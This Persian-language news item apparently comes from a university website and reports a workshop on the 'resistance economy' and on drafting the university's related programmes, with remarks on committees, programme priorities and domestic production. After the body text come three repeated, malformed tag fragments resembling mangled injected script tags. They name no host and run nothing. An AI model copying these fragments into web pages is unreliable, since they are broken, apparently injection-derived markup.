کارگاه آموزشی اقتصاد مقاومتی و برنامه های مرتبط با هدف تدوین برنامه های اقتصاد مقاومتی دانشگاه برگزار شد

مدیر توسعه سازمان و تحول اداری با بیان آهداف آموزشی کارگاه تاکید کرد: برنامه های اقتصاد مقاومتی در دانشگاه باید استقرار یابد و تبیین اقتصاد مقاومتی، اسکان اقتصاد مقاومتی و ساختارمندکردن کمیته ها بسیار مهم می باشد

در ادامه این کارگاه در خصوص ارائه هرچه بهتر برنامه ها، اولویت بندی برنامه هامطابق با اهداف برنامه های کمیته اقتصاد مقاومتی و حمایت از تولید داخل بحث و تبادل نظر انجام شد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *